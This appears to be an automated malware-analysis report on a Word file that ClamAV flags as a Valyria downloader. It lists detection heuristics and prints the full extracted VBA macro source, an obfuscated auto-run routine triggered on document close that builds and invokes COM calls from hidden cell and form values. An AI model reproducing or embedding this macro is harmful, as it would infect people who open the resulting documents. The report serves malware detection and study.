MALICIOUS
Risk Score: 222
Heuristics: 5
- ClamAV: Doc.Downloader.Valyria-10033915-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
- VBA project inside OOXML (medium, OOXML_VBA, 2 related findings): Document contains a VBA project; VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:
  Set n4 = CreateObject(UserForm1.qk & UserForm1.bz)
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call. Matched line in script:
  Set E = CallByName(n4.Workbooks, UserForm1.ez & UserForm1.pb, 1, UserForm2.ComboBox1, , , , UserForm1.ak)
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7003 bytes |

SHA-256: 66e2c4223cd521f450169b46d43708c5d07cd4378c4f66327fb980d95082d9f1

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public no, kf, ce, c9, si, n4, m9, qv, p6, hix, k9, mv, nzz, ke, n3, bb
Sub Document_Close()
h6
End Sub
Sub h6()
On Error Resume Next
UserForm2.ComboBox1.ListIndex = 5
kt = UserForm2.ComboBox13
Set n4 = CreateObject(UserForm1.qk & UserForm1.bz)
n4.DisplayAlerts = False
ljw = 1301
cn = 0
Err.Number = 0
While ljw <> 0 And cn < 32
Set E = CallByName(n4.Workbooks, UserForm1.ez & UserForm1.pb, 1, UserForm2.ComboBox1, , , , UserForm1.ak)
ljw = Err.Number
cn = cn + 16
Wend
If ljw <> 0 Then
ErrHandler:
na8 = CallByName(Application, UserForm1.eb & UserForm1.qf, 2)
If na8 <> False Then
or4 = UserForm2.ComboBox6
Set kr = CreateObject(UserForm1.ik & UserForm1.f3)
CallByName kr.Documents, UserForm1.ez & UserForm1.pb, 1, ActiveDocument.FullName, , True
CallByName kr, UserForm1.h9 & UserForm1.rlq, 1, Now + TimeSerial(0, 0, 2), UserForm1.i4 & UserForm1.l1 & "h6"
Else
jh = UserForm2.ComboBox8
CallByName Application, UserForm1.h9 & UserForm1.rlq, 1, Now + TimeSerial(0, 0, 17), UserForm1.i4 & UserForm1.l1 & "h6"
End If
n4.Quit
Exit Sub
End If
Dim c7
Set c7 = n4.sheets(1)
god = UserForm2.ComboBox15
vv = "'"
bb = n4.sheets(5).Cells(1, 1)
If Len(bb) < 1 Then
If n4.ActiveWorkbook.Title <> "Google" Then
GoTo ErrHandler
Else
cd = UserForm2.ComboBox3
Exit Sub
End If
End If
t1 = n4.sheets(1).Cells(49, 27).Value
r2 = c7.Cells(99, 20).Value
hix = n4.sheets(1).Cells(93, 60).Value
k9 = n4.sheets(2).Cells(134, 44).Value
si = n4.sheets(2).Cells(113, 7).Value
q0 = n4.sheets(2).Cells(78, 9).Value
dq = n4.sheets(1).Cells(80, 30).Value
ga = UserForm2.ComboBox9
v1y = n4.sheets(3).Cells(52, 45).Value
jp = n4.sheets(2).Cells(11, 2).Value
o9 = n4.sheets(1).Cells(29, 52).Value
nzz = n4.sheets(2).Cells(126, 10).Value
m9 = c7.Cells(124, 1).Value
p6 = n4.sheets(3).Cells(24, 6).Value
p9 = n4.sheets(3).Cells(74, 12).Value
hi = n4.sheets(2).Cells(44, 36).Value
jv = UserForm2.ComboBox5
mv = c7.Cells(53, 50).Value
tc9 = n4.sheets(1).Cells(149, 47).Value
ug = n4.sheets(2).Cells(51, 53).Value
no = n4.sheets(3).Cells(131, 27).Value
di2 = n4.sheets(3).Cells(143, 51).Value
h8 = c7.Cells(116, 32).Value
j67 = UserForm2.ComboBox12
qv = n4.sheets(3).Cells(112, 29).Value
kf = n4.sheets(3).Cells(134, 8).Value
gs = n4.sheets(3).Cells(131, 46).Value
r4 = UserForm2.ComboBox21
pl = n4.sheets(2).Cells(58, 24).Value
rk3 = UserForm2.ComboBox5
n3 = ""
Set Sh1 = n4.sheets(4)
jf = 1
k5 = True
While k5
lc = Sh1.Cells(jf, 1).Value
If Len(lc) < 1 Then
k5 = False
Else
n3 = n3 & lc
End If
jf = jf + 1
Wend
d6 = CallByName(n4, o9, 2)
UserForm1.pk9.Value = dq & d6 & ug
UserForm1.bk.Value = r2
CallByName CreateObject(pl), h8, 1, UserForm1.pk9, tc9, UserForm1.bk
Set o4 = CreateObject(t1)
ig = UserForm2.ComboBox19
Set ac = CallByName(o4, q0, 2)
Set r1 = CallByName(ac, gs, 1)
Set p6 = CallByName(o4, p6, 2)
Set c9 = o4
h7 = UserForm2.ComboBox17
UserForm5.ComboBox1 = "o1"
Set no = CallByName(ke, no, 2)
qv = CallByName(no, qv, 2)
UserForm1.lx.Value = di2 & v1y
UserForm3.ComboBox1 = jp
fy = UserForm2.ComboBox13
UserForm1.lx.Value = p9
UserForm4.ComboBox1 = UserForm3.ComboBox1
UserForm3.ComboBox1 = qv
o4 = fm
E = k3
duq = UserForm2.ComboBox12
c7 = c3
ac = hm
r1 = et
p6 = ek
hix = jr
j84 = UserForm2.ComboBox9
k9 = hz
ke = dv
no = fkt
c2k = UserForm2.ComboBox27
c9 = n7
DoEvents
CallByName n4, hi, 1
e8 = UserForm2.ComboBox26
n4 = uj
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C80ED98B-F814-4187-8274-0F9E8E1BEC6D}{D573506A-15DC-4A19-BDC2-289AC28A48B6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{7F2874F9-FFFD-4B3D-9F74-0B433096FF5A}{F2E480F2-E86F-45CA-B15F-FAB9CF9EDF24}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
vj = UserForm2.ComboBox10
hv = UserForm2.Controls.Count - 1
bd = UserForm2.ComboBox23
mx = UserForm2.ComboBox18
dy = ""
For mu7 = 1 To hv Step 2
dy = dy & UserForm2.Controls.Item(mu7)
Next
hs = UserForm2.ComboBox7
ComboBox1.AddItem "f8"
b7 = UserForm2.ComboBox5
ComboBox1.AddItem "zg"
ComboBox1.AddItem "ei"
ComboBox1.AddItem "ed"
ComboBox1.AddItem "i3"
ComboBox1.AddItem dy
ComboBox1.AddItem "gz"
ro = UserForm2.ComboBox22
p0 = UserForm2.ComboBox6
End Sub
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{26CFAB0F-445A-48D4-A1AB-73861D6FA525}{82CB858B-FD75-432E-B12A-44763EAC3EBD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
CallByName ActiveDocument.no, ActiveDocument.m9, VbMethod, 1, ActiveDocument.qv
CallByName ActiveDocument.no, ActiveDocument.kf, VbMethod, UserForm1.lx.Value
End Sub
Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{615C4FC4-A62E-44E5-A2F0-2D83C21282C9}{1EF39E8A-4508-497E-96D0-6B752228C4EA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
CallByName ActiveDocument.c9, ActiveDocument.si, VbMethod, UserForm1.lx.Value, ActiveDocument.n3, ActiveDocument.bb
End Sub
Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{5CE4AFA8-8333-47D0-A4EA-7D133B805A8C}{BE2A8477-15A3-4171-984C-64AF0E672AA4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
Set ActiveDocument.hix = CallByName(ActiveDocument.p6, ActiveDocument.hix, VbGet)
Set ActiveDocument.k9 = CallByName(ActiveDocument.hix, ActiveDocument.k9, VbGet)
Set ActiveDocument.ke = CallByName(ActiveDocument.k9, ActiveDocument.mv, VbMethod, ActiveDocument.nzz)
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 51200 bytes |

SHA-256: 7c26191f361eb97cb16447f11420a8dd572d3c8abe3c687b60e3a40f3cbf8750

Detection
- ClamAV: Doc.Downloader.Valyria-10033915-0
- Obfuscation or payload: unlikely